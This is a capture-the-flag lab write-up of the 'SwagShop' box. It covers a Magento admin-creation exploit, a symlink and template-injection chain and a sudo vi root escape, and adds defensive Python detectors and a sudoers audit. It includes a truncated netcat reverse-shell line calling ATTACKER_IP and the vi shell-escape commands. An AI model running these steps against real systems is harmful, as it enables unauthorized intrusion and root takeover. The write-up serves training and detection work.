SwagShop runs an outdated Magento e‑commerce platform vulnerable to multiple public exploits.
The initial foothold is obtained by creating an admin user through a known Magento RCE.
From the admin panel, template injection and symlink abuse allow uploading a PHP reverse shell.
Privilege escalation is achieved through a sudo‑allowed vi binary.
Target: swagshop.htb
Initial vector: Magento RCE → admin account creation
Privilege escalation: sudo vi → root shell
Nmap:
22/tcp  ssh
80/tcp  http (Apache 2.4.18)
The site redirects to:
http://swagshop.htb
Wappalyzer / WhatWeb identify the CMS as:
Magento
Searchsploit reveals a Python exploit that creates a new Magento admin user:
$ searchsploit magento
The relevant result is 37977.py.
Modify the exploit to set your own username and password, then run it:
$ python3 magento_rce.py
Log in to the Magento admin panel:
http://swagshop.htb/index.php/admin
Enable symlinks in the admin configuration (required for the Froghopper attack).
Next, prepare the file the template injection will include: a PHP reverse shell disguised as an image:
&1|nc ATTACKER_IP 443 >/tmp/f"); ?>
Save it as kacked.php.png and upload it under:
Catalog → Manage Categories → Add Image
Copy the uploaded file’s URL (hover to reveal the path).
Go to:
Newsletter → Newsletter Templates → Add New Template
Insert the following template injection payload:
{{block type="core/template" template="../../../../../../"}}
Save → Preview Template. With a listener running:
$ nc -nlvp 443
A shell is obtained as www-data.
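From the defender's side, the chain above leaves two artefacts in the Magento admin panel: a media upload whose name hides an executable extension before the image extension (kacked.php.png), and a newsletter template whose {{block}} directive points outside the theme directory with ../ traversal. The following Python is an added example, not code from the original writeup; the Apache log lines and template bodies it checks are constructed samples.

```python
"""Detection checks for the Magento admin-panel chain described above.
Added example, not from the original writeup; the log lines and
template bodies below are constructed, not captured from the box."""
import re
from pathlib import PurePosixPath

# Extensions a PHP handler may execute. A handler that matches on any
# suffix rather than only the last one is what makes kacked.php.png run.
EXEC_EXTS = {".php", ".phtml", ".phar", ".php5", ".php7"}
IMAGE_EXTS = {".png", ".jpg", ".jpeg", ".gif"}

# Apache combined log: client ident user [time] "METHOD path proto" status ...
LOG_LINE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3})'
)
BLOCK_DIRECTIVE = re.compile(r"\{\{block\b([^}]*)\}\}", re.IGNORECASE)
ATTR = re.compile(r'(\w+)\s*=\s*"([^"]*)"')


def is_double_extension(filename):
    """True for image-looking names that also carry an executable extension,
    e.g. kacked.php.png; shirt.png and archive.tar.gz are not flagged."""
    suffixes = [s.lower() for s in PurePosixPath(filename).suffixes]
    if not suffixes or suffixes[-1] not in IMAGE_EXTS:
        return False
    return any(s in EXEC_EXTS for s in suffixes[:-1])


def scan_access_log(lines):
    """Return request paths under /media/ whose filename hides an executable
    extension; these are the uploads a reviewer should pull and inspect."""
    flagged = []
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue
        path = m.group("path").split("?", 1)[0]  # drop any query string
        if path.startswith("/media/") and is_double_extension(PurePosixPath(path).name):
            flagged.append(path)
    return flagged


def suspicious_block_directives(template_body):
    """Return the attributes of every {{block}} directive that escapes the
    theme directory with '..' or renders core/template with a template that
    is not a .phtml file. The writeup's payload does both."""
    hits = []
    for m in BLOCK_DIRECTIVE.finditer(template_body):
        attrs = dict(ATTR.findall(m.group(1)))
        template = attrs.get("template", "")
        traversal = ".." in PurePosixPath(template).parts
        wrong_type = attrs.get("type") == "core/template" and not template.endswith(".phtml")
        if traversal or wrong_type:
            hits.append(attrs)
    return hits


# Constructed samples (client IP, timestamps and sizes are made up).
SAMPLE_LOG = [
    '10.10.14.5 - - [12/May/2019:10:01:40 +0000] "GET /media/catalog/category/shirt.png HTTP/1.1" 200 34811 "-" "Mozilla/5.0"',
    '10.10.14.5 - - [12/May/2019:10:02:11 +0000] "GET /media/catalog/category/kacked.php.png HTTP/1.1" 200 612 "-" "Mozilla/5.0"',
]
SAMPLE_TEMPLATES = {
    "legit-footer": '{{block type="core/template" template="email/footer.phtml"}}',
    "traversal": '{{block type="core/template" template="../../../../../../media/catalog/category/kacked.php.png"}}',
}

if __name__ == "__main__":
    print("uploads to review:", scan_access_log(SAMPLE_LOG))
    for name, body in SAMPLE_TEMPLATES.items():
        print(name, "->", suspicious_block_directives(body))
```

The two checks complement each other: the log scan catches the staged file even if the template was never saved, and the template scan catches the directive even if the upload went through a path the web server does not log. Both are reasons to keep "Allow Symlinks" off and to restrict which roles may edit newsletter templates.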
Check sudo permissions:
$ sudo -l
(root) NOPASSWD: /usr/bin/vi /var/www/html/gothacked
Use vi to escape to a root shell:
$ sudo vi /var/www/html/gothacked
Inside vi:
:set shell=/bin/bash
:shell
Root access obtained.
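The sudo rule is the root cause of the escalation, and it is the kind of entry a sudoers audit can flag mechanically. The Python below is an added example, not from the original writeup: it parses sudo -l output, reports rules that run a vi-family editor as another user without the NOEXEC tag, and proposes the sudoedit form that lets the user edit the same file without ever running the editor as root. The sample output is constructed to mirror the entry shown above.

```python
"""Audit sudo -l output for editor rules that hand out a shell.
Added example, not from the original writeup; SAMPLE_SUDO_L is a
constructed copy of the kind of entry shown above."""
import re
import shlex
from pathlib import PurePosixPath

# vi-family editors: ":set shell=... / :shell" runs a shell as the run-as
# user, so a rule allowing them as root is effectively a root shell.
EDITOR_BINARIES = {"vi", "vim", "vim.basic", "vim.tiny", "view"}

# One sudo -l entry looks like "(runas) TAG: TAG: /path/to/cmd args".
SUDO_ENTRY = re.compile(r"^\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>\S.*)$")


def parse_entry(line):
    """Parse one sudo -l entry into runas, tag set and argv.
    Header lines such as 'User ... may run ...' return None."""
    m = SUDO_ENTRY.match(line.strip())
    if not m:
        return None
    tags = {t.strip() for t in m.group("tags").split(":") if t.strip()}
    return {"runas": m.group("runas"), "tags": tags, "argv": shlex.split(m.group("cmd"))}


def audit_sudo_output(lines):
    """Return one finding per rule that lets an editor run without NOEXEC.
    Each finding carries the sudoedit replacement for the same file(s)."""
    findings = []
    for line in lines:
        entry = parse_entry(line)
        if entry is None or not entry["argv"]:
            continue
        binary = PurePosixPath(entry["argv"][0]).name
        if binary in EDITOR_BINARIES and "NOEXEC" not in entry["tags"]:
            files = entry["argv"][1:]
            findings.append({
                "rule": line.strip(),
                "binary": binary,
                "runas": entry["runas"],
                "nopasswd": "NOPASSWD" in entry["tags"],
                # sudoedit copies the file, runs the editor as the caller,
                # and writes the result back as the run-as user.
                "fix": "sudoedit " + (" ".join(files) if files else "<file>"),
            })
    return findings


# Constructed sudo -l output modelled on the entry above.
SAMPLE_SUDO_L = [
    "Matching Defaults entries for www-data on swagshop:",
    "    env_reset, mail_badpass",
    "",
    "User www-data may run the following commands on swagshop:",
    "    (root) NOPASSWD: /usr/bin/vi /var/www/html/gothacked",
]

if __name__ == "__main__":
    for f in audit_sudo_output(SAMPLE_SUDO_L):
        print(f"{f['rule']}\n  -> replace with: {f['fix']}")
```

NOEXEC alone only stops the editor from spawning child processes; an editor still running as root can write wherever root can, which is why the finding recommends sudoedit rather than just adding the tag. On the box, `(root) NOPASSWD: sudoedit /var/www/html/gothacked` would have let www-data edit that one file and nothing else.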
SwagShop demonstrates a classic Magento exploitation chain: create an admin user via RCE, abuse template
injection to upload a reverse shell, and escalate privileges using a sudo‑allowed vi binary.
A straightforward but satisfying exploitation path.